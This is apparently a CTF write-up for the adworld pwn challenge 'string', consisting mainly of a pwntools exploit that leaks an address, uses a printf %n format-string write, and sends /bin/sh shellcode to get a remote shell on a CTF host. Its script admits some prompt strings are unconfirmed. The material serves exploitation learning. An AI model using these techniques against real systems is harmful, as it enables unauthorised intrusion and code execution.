adworld (XCTF 攻防世界) pwn writeup | string

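#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Exploit for the adworld pwn challenge "string" (pwntools, Python 3).

Three stages, following the binary's prompts:

1. At start-up the program prints the address of ``secret[0]`` (``v3[0]``
   in the decompiler output); it is parsed from that leak.
2. ``sub_400BB9`` passes user input straight to ``printf``.  A ``%n``
   format-string write stores the value 85 into ``secret[0]`` so the
   later ``secret[0] == 85`` check passes.
3. ``sub_400CA6`` casts the next input to a function pointer and calls
   it, so raw shellcode sent at that prompt is executed.

The prompt substrings below were recovered from a garbled listing of the
original script; confirm each one against ``strings`` of the binary
before relying on it -- a mismatched ``recvuntil`` simply hangs.

Only run this against a target you are authorised to attack (the default
host below was a CTF instance).
"""
import sys

from pwn import *

# Default CTF target; override with ``python3 exploit.py HOST PORT``.
HOST = "111.198.29.45"
PORT = 42643

# printf argument slot that the format-string write goes through.  This
# is binary-specific (the offset used by the original writeup); re-derive
# it with ``%p`` probes if the binary differs.
FMT_OFFSET = 7
# Value secret[0] must hold for the check in the following stage.
TARGET_VALUE = 85


def leak_secret_addr(io) -> int:
    """Return the address of secret[0] printed by the program at start-up.

    The line looks like ``secret[0] is 0x...``; the hex number is taken from
    the remainder of that line.
    """
    io.recvuntil(b"secret[0] is")
    addr = int(io.recvline().strip().decode(), 16)
    log.info(f"secret[0] address: {addr:#x}")
    return addr


def write_secret(io, addr: int) -> None:
    """Use the printf format-string bug to store TARGET_VALUE at ``addr``.

    ``%85c`` makes printf emit 85 characters, then ``%7$n`` stores that
    count -- as a 4-byte int -- through the pointer printf finds in argument
    slot FMT_OFFSET.  Per the original writeup that slot holds the address
    entered at the preceding prompt, so the write lands on secret[0].
    """
    io.recvuntil(b"Give me an address")
    # The binary apparently parses the address as a decimal integer -- TODO confirm.
    io.sendline(str(addr).encode())
    io.recvuntil(b"wish is:")
    payload = f"%{TARGET_VALUE}c%{FMT_OFFSET}$n".encode()
    io.sendline(payload)


def send_shellcode(io) -> None:
    """Deliver execve("/bin/sh") shellcode to the stage that calls its input.

    ``context`` must already be set to amd64, otherwise ``asm()`` produces
    i386 code and the target crashes.
    """
    shellcode = asm(shellcraft.sh())
    # If the target reads its input line-wise (not verified here), a 0x0a
    # byte inside the shellcode would truncate it -- warn rather than guess.
    if b"\n" in shellcode:
        log.warning("shellcode contains a newline byte; it may be truncated by the target's read")
    io.recvuntil(b"spell")
    io.sendline(shellcode)


def main(argv: list[str]) -> None:
    """Run the three stages against HOST:PORT (or argv overrides) and drop to a shell."""
    host = argv[1] if len(argv) > 1 else HOST
    port = int(argv[2]) if len(argv) > 2 else PORT
    # Set the target architecture before any asm()/shellcraft call; the
    # original writeup notes its first shellcode attempt failed only because
    # this line was missing (pwntools defaults to i386).
    context(os="linux", arch="amd64")
    io = remote(host, port)
    try:
        addr = leak_secret_addr(io)
        # sub_400D72: character name, any value is accepted.
        io.recvuntil(b"name be:")
        io.sendline(b"123")
        # sub_400A7D: the "east" branch leads to the format-string stage.
        # The binary compares this string exactly, so match its case.
        io.recvuntil(b"east or up?")
        io.sendline(b"east")
        # sub_400BB9: answer 1 ("stay") to reach the vulnerable printf.
        io.recvuntil(b"Leave(0)?")
        io.sendline(b"1")
        write_secret(io, addr)
        send_shellcode(io)
        io.interactive()
    finally:
        io.close()


if __name__ == "__main__":
    main(sys.argv)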


References:

https://www.jianshu.com/p/457520f97a76

https://blog.csdn.net/qq_35495684/article/details/79583232

https://adworld.xctf.org.cn/task/writeup?type=pwn&id=5056&number=2&grade=0&page=1

https://www.jianshu.com/p/8322fa5dff22


Original post: https://www.cnblogs.com/chrysanthemum/p/11772977.html